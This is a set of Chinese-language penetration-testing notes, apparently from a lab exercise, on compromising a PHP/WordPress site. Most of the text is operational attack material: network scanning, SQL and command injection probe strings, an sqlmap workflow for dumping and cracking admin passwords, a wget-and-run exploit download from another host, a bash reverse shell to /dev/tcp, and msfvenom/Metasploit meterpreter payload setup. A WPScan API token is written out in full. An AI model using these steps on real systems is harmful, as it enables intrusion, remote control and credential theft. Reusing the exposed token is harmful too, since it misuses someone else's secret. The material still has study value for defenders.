PHP站点渗投

cd\
cd .\Users
dir
cd yuanfh
cd .\Desktop\
ls
.\pc.psl

.\pc.psl
..\pc.psl
powercat

测试注入点是否存在通常是指在Web应用程序的安全测试中，检查是否有可能执行SQL注如、命令注入或其他类型的注入公鸡。这是一个敏感的操作，因为它涉及到可能违反法律和道德规范的行为。在进行此类测试之前，你必须确保你有权对目标系统进行安全测试，通常这意味着你需要得到系统所有者或管理员的明确许可。

发现地址

在Kali Linux中，有许多工具可以用来发现局域网内的IP地址。以下是几种常用的方法：

使用arp命令

arp命令可以显示本地计算机的ARP缓存表，其中包含了局域网内设备的IP地址和MAC地址。

sudo arp -a

1.

使用nmap工具

nmap是一个强大的网络扫描工具，可以用来发现局域网内的活跃主机。

sudo nmap -sn 192.168.1.0/24

1.

这里的192.168.1.0/24是你想要扫描的网络地址。这个命令会扫描该网段内的所有IP地址，并显示哪些地址有回应。

基本端口扫描

要扫描局域网内所有主机的开放端口，可以使用以下命令：

sudo nmap -p- 192.168.1.0/24

1.

这里，-p-参数表示扫描所有65535个TCP端口，192.168.1.0/24是要扫描的局域网网段。

指定端口范围扫描

如果你只想扫描特定的端口范围，可以使用以下命令：

sudo nmap -p 1-1024 192.168.1.0/24

1.

这里，-p 1-1024表示只扫描1到1024号端口。

快速扫描（SYN扫描）

如果你想进行更快速的扫描，可以使用SYN扫描（也称为半开放扫描）：

sudo nmap -sS -p- 192.168.1.0/24

1.

这里，-sS参数表示使用SYN扫描。

使用ping命令

ping命令可以用来测试与某个IP地址的连通性。你可以遍历一个网段的所有IP地址来发现活跃的设备。

for ip in $(seq 1 254); do  

   ping -c 1 192.168.1.$ip &>/dev/null && echo "192.168.1.$ip is up"  

done

1.

2.

3.

这个脚本会依次ping局域网内的每个IP地址，并打印出有回应的地址。

使用fping工具

fping是一个快速的ping工具，可以同时ping多个IP地址。

sudo fping -a 192.168.1.0/24

1.

使用netdiscover工具

netdiscover是一个用于发现局域网内所有设备的工具。

sudo netdiscover -r 192.168.1.0/24

1.

使用avahi-browse工具

avahi-browse是一个用于浏览局域网内设备的服务发现工具。

sudo avahi-browse -a

1.

使用ipneigh命令

ipneigh命令可以显示本地网络接口的邻居缓存表。

sudo ip neigh show

1.

使用tcpdump工具

tcpdump是一个网络嗅探工具，可以用来捕获和分析网络流量。通过分析捕获的数据包，你可以发现局域网内的IP地址。

sudo tcpdump -i eth0 -nn host 192.168.1.0/24

1.

以下是一些常见的注入点测试方法：

SQL注如测试

单引号测试：尝试在输入框中输入单引号'，如果应用程序返回错误或者异常，这可能表明存在SQL注如的风险。

基于错误的注入：尝试输入可能导致SQL语法错误的输入，比如1' OR '1'='1，如果应用程序返回了数据库的错误信息，这可能是一个注入点。

基于时间的注入：使用延时函数，如MySQL中的BENCHMARK()或SLEEP()，来测试应用程序的响应时间是否有异常变化。

基于联合查询的注入：尝试使用UNION SELECT语句来检索额外的数据，例如1 UNION SELECT version(), @@version--。

命令注入测试

分隔符测试：尝试在输入中加入操作系统命令分隔符，如Windows中的;或Linux中的&&或|，看是否能执行多个命令。

特殊字符测试：尝试输入特殊字符，如&、<、>、*等，这些字符在命令行中有特殊含义，可能导致意外的命令执行。

反引号测试：在一些编程语言中，如PHP，可以使用反引号`来执行系统命令，尝试输入包含反引号的输入，看是否能执行命令。

注意事项

合法性：未经授权的渗投测试是非法的，务必获得相应的授权。

道德性：即使获得了授权，也应遵循道德准则，避免对生产环境造成影响。

责任性：在发现漏动后，应负责任地向系统所有者报告，而不是滥用这些信息。

安全性：在进行测试时，确保自己的行为不会对系统的安全性和稳定性造成威胁。

如果你是在合法授权的情况下进行测试，可以使用专业的工具如SQLMap、Burp Suite等来自动化检测注入点。这些工具能够帮助你更有效地识别和验证潜在的注入漏动。记住，任何安全测试都应该在合法和道德的框架内进行。

发现可疑的路径点击进来查看，看看重要文件，发现备份下载下来。

经过查看是一个web的网站源码，就是下面这个文件夹gila的备份zip

使用wpscan扫描

wpscan  --url http://172.31.1.30/wp

wpscan 是一个用于审计 WordPress 网站安全的工具。它能够检测 WordPress 核心、插件、主题中的已知漏动，以及提供一些其他有用的信息。

如果你想要对 http://172.31.1.30/wp 进行扫描，可以使用以下命令：

wpscan --url http://172.31.1.30/wp

这个命令将会对指定的 URL 进行一个基本的扫描。默认情况下，wpscan 会检测 WordPress 核心、插件和主题的版本，并检查是否有已知的安全漏动。

附加选项

wpscan 提供了许多附加选项，可以根据需要进行配置。以下是一些常用的选项：

--enumerate: 枚举更多的信息，例如用户、插件、主题等。

--plugins: 只扫描插件。

--themes: 只扫描主题。

--vulns: 显示已知漏动。

--output-file <file>: 将扫描结果保存到文件。

例如，如果你想要枚举用户并显示已知漏动，可以使用以下命令：

wpscan --url http://172.31.1.30/wp --enumerate u --vulns

wpscan --api-token hDYOmjBiuxVlkLVk4wkSPHESisqIqmVUoM8rG0PmaY0 --url http://172.31.1.30/wp

当你使用 wpscan 进行 WordPress 安全扫描时，如果你有一个 WPScan API 密钥（API token），你可以将其添加到命令中以解锁额外的功能和更快的扫描速度。API 密钥通常用于支持 WPScan 项目，并通过捐赠获得（目前免费）。

以下是如何在你的命令中包含 API 密钥的示例：

wpscan --api-token hDYOmjBiuxVlkLVk4wkSPHESisqIqmVUoM8rG0PmaY0 --url http://172.31.1.30/wp

在这个命令中，hDYOmjBiuxVlkLVk4wkSPHESisqIqmVUoM8rG0PmaY0 是你的 API 密钥，http://172.31.1.30/wp 是你要扫描的 WordPress 站点的 URL。

附加选项

除了基本的扫描之外，你还可以添加其他选项来定制你的扫描。例如，如果你想要枚举用户并检查已知的漏动，你可以使用以下命令：

wpscan --api-token hDYOmjBiuxVlkLVk4wkSPHESisqIqmVUoM8rG0PmaY0 --url http://172.31.1.30/wp --enumerate u --vulnerabilities

在这个命令中，--enumerate u 表示枚举用户，而 --vulnerabilities 表示检查已知的漏动。

通用流程

扫端口-发现端口-发现web站点/应用-手动搜集信息-遍历目录-后台登陆页面及重要文件-根据扫描到的目录、版本信息查看有什么针对性的专用漏动扫描器-检查有没有扫描可以利用。

sql注如

发现诸如点-sqlmap跑数据库名和表名-爆破应用数据库及数据表-管理员/用户数据表把账户和密吗下载出来-做破接-利用密吗登录管理员后台-进一步渗投站点

cd /tmp
pwd
wget http://172.31.1.16/exp
chmod 777 exp
./exp

看回显发现也没有问题，成功了。执行了exp之后也获得了权限

以下是具体步骤：

在Kali机器上安装并配置Web服务器（以Apache为例）：

sudo apt-get update
sudo apt-get install apache2

将反弹shell脚本上传到Apache的默认目录（通常是/var/www/html）：

sudo cp /path/to/your/reverse_shell.php /var/www/html/

确保Apache服务正在运行：

sudo systemctl start apache2
sudo systemctl enable apache2

在Web端，使用wget命令下载反弹shell脚本。首先，找到你的Kali机器的IP地址，然后在Web端执行以下命令（将your_kali_ip替换为实际的IP地址）：

wget http://your_kali_ip/reverse_shell.php

下载完成后，你可以使用PHP或其他支持的语言来执行反弹shell脚本。例如，如果你使用的是PHP，可以在Web端执行以下命令：

php reverse_shell.php

或者

要在Web端利用wget下载Kali机器上的反弹shell，你需要遵循以下步骤：

首先，在Kali机器上创建一个反弹shell脚本。这里我们使用bash shell作为示例：

#!/bin/bash
bash -i >& /dev/tcp/your_attacker_ip/your_attacker_port 0>&1

将上述代码中的your_attacker_ip和your_attacker_port替换为你的公鸡者IP地址和端口号。

保存脚本到一个文件，例如reverse_shell.sh，并确保它具有可执行权限：

chmod +x reverse_shell.sh

在Kali机器上启动一个监听器，以便接收反弹的shell连接。你可以使用netcat或nc工具来实现这一点：

nc -lvp your_attacker_port

将your_attacker_port替换为你在第1步中设置的端口号。

在Web端，使用wget命令下载反弹shell脚本。假设你已经知道Kali机器上的URL路径（例如：http://kali_machine_ip/reverse_shell.sh），则可以使用以下命令：

wget http://kali_machine_ip/reverse_shell.sh

下载完成后，你可以在Web端的机器上运行下载的反弹shell脚本，以连接到Kali机器：

./reverse_shell.sh

现在，你应该已经成功建立了从Web端到Kali机器的反弹shell连接。请注意，这种方法仅适用于你有权限访问Kali机器上的反弹shell脚本的情况。此外，出于安全原因，不建议在生产环境中使用此类技术。

exp编写

在Kali Linux上，你可以使用Metasploit框架来创建一个针对特定网站的漏动利用（exploit）脚本。以下是一个简单的示例，用于创建一个基于PHP的Web应用程序漏动的Metasploit模块：

首先，确保你已经安装了Metasploit框架。如果没有，请运行以下命令安装：

sudo apt-get update
sudo apt-get install metasploit-framework

创建一个新的Metasploit模块。打开终端并输入以下命令：

msfvenom -p php/meterpreter_reverse_tcp LHOST=your_kali_ip LPORT=your_kali_port -f raw > shell.php

将your_kali_ip替换为你的Kali Linux机器的IP地址，将your_kali_port替换为你希望监听的端口号。这将生成一个名为shell.php的文件，其中包含一个反向TCP Meterpreter shell。

将生成的shell.php文件上传到目标网站的服务器上。你可以使用FTP客户端、SCP或其他方法将文件传输到目标服务器。

在Kali Linux上，启动Metasploit控制台并设置监听器：

msfconsole

在Metasploit控制台中，输入以下命令以设置监听器：

use exploit/multi/handler
set PAYLOAD php/meterpreter_reverse_tcp
set LHOST your_kali_ip
set LPORT your_kali_port
exploit

现在，当目标用户访问上传了shell.php文件的网站时，他们将被连接到你的Kali Linux机器上的Metasploit监听器。你可以在Metasploit控制台中执行各种命令来控制目标系统。

请注意，这只是一个简单的示例，实际的公鸡可能需要更复杂的漏动利用和公鸡策略。在进行任何形式的渗投测试或公鸡之前，请确保你拥有合法的授权和权限。